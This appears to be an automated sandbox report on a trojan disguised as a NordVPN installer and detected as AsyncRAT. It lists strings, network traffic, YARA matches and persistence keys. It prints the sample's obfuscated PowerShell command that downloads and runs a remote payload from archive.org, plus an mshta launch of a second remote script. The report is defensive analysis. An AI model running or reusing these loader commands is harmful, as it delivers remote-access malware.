Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmp; String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000003.00000003.207486771.0000027D9F6B6000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp; String found in binary or memory: http://crl.goi
Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmp; String found in binary or memory: http://crl.microsoft
Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000003.00000002.478183437.0000027D87F0E000.00000004.00000001.sdmp; String found in binary or memory: http://ia601406.us.archive.org
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: http://ia803408.us.archive.org
Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmp; String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/0
Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/02
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.472135094.0000027D871C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: https://archive.org
Source: powershell.exe, 00000003.00000002.477635897.0000027D87D15000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478302181.0000027D87F6C000.00000004.00000001.sdmp; String found in binary or memory: https://archive.org/download/run-02-02-02/Run_02_02_02.TXT
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: https://archive.orgx
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp; String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.480627087.0000027D88C97000.00000004.00000001.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org
Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/32/items/run-02-02-02/Run_02_02_02.TXT
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/
Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt
Source: powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt0ywI
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org8
Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.orgx
Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/
Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp, xGrfj8RvYg.exe; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...
Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7l
Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt0
Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1
Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtC:
Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtQ
Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtf
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txto
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtr
          Source: mshta.exe, 00000002.00000002.216764785.0000020091CE0000.00000004.00000040.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txts
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtst-MC:
          Source: xGrfj8RvYg.exe, 00000000.00000002.199598225.0000000002B51000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtx
          Source: powershell.exe, 00000003.00000002.477168577.0000027D87BD2000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org
          Source: powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/
          Source: powershell.exe, 00000003.00000003.207800027.0000027D9F706000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items
          Source: mshta.exe, mshta.exe, 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/AL
          Source: PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt.3.dr, Clean_lol123[1].txt.2.drString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org
          Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org/9/items/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.orgx
          Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.comq
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownHTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected AsyncRAT
          Source: Yara match; File source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara match; File source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Window created: window name: CLIPBRDWNDCLASS

          System Summary:

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFAEDAE0E57
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFAEDBB25E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFAEDBB15ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 23_2_02ACD5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 23_2_02AC9530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 23_2_02AC8C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 23_2_02ACF298
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 23_2_02AC8918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 25_2_0141D5AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 25_2_0141F5F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 25_2_0141D5A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 25_2_0141B8FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 25_2_0141DB69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 25_2_0141DB78
          Source: xGrfj8RvYg.exe, 00000000.00000002.199383295.0000000000F10000.00000002.00000001.sdmp; Binary or memory string: System.OriginalFileName vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000000.196616953.00000000008C4000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199294357.0000000000E2A000.00000004.00000020.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmp; Binary or memory string: originalfilename vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe; Binary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscorjit.dll
          Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, type: DROPPED; Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs; Base64 encoded string: 'qkd/uccjEGFopaL8x4X62OjpEkF53RIrVmdHiIQT3o/oSel/ZFoI3BdUmWGHw1QXea71IOmDn7FuU2mCoQMVHQ==', 'hu2k5qJU3Ty2oDTj9+W03QlquYg2dD10GaZparwCdAkmRlNWAS0v22EB8YrQ8Uuf+ogLizH6sAwXxQtwm9V5kA==', 'ieUFpXePoV+SLhE1mkNi838rLb1MrmgcD6jT/ToFxM4NwMgrxtupl3TG+gmecuvcCEnfuvzcUaxvKVL2Bjh9Ig==', 'PDhFyyKTiKYYUzBZG+73bNiREvjUdtm9jrHBghKK3CI434oJNToMdDpHb8z2JmoINzTXxC+KtllMwRsjolrdRg=='
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs; Base64 encoded string: 'qkd/uccjEGFopaL8x4X62OjpEkF53RIrVmdHiIQT3o/oSel/ZFoI3BdUmWGHw1QXea71IOmDn7FuU2mCoQMVHQ==', 'hu2k5qJU3Ty2oDTj9+W03QlquYg2dD10GaZparwCdAkmRlNWAS0v22EB8YrQ8Uuf+ogLizH6sAwXxQtwm9V5kA==', 'ieUFpXePoV+SLhE1mkNi838rLb1MrmgcD6jT/ToFxM4NwMgrxtupl3TG+gmecuvcCEnfuvzcUaxvKVL2Bjh9Ig==', 'PDhFyyKTiKYYUzBZG+73bNiREvjUdtm9jrHBghKK3CI434oJNToMdDpHb8z2JmoINzTXxC+KtllMwRsjolrdRg=='
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engine; Classification label: mal92.troj.evad.winEXE@12/12@5/7
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.log
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1
          Source: xGrfj8RvYg.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\mshta.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown; Process created: C:\Users\user\Desktop\xGrfj8RvYg.exe 'C:\Users\user\Desktop\xGrfj8RvYg.exe'
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window Recorder; Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: xGrfj8RvYg.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: xGrfj8RvYg.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: xGrfj8RvYg.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Data Obfuscation:

          Obfuscated command line found
          Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: xGrfj8RvYg.exe; Static PE information: 0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]

          Boot Survival:

          Yara detected AsyncRAT
          Source: Yara match; File source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara match; File source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
          Source: C:\Windows\System32\mshta.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powersh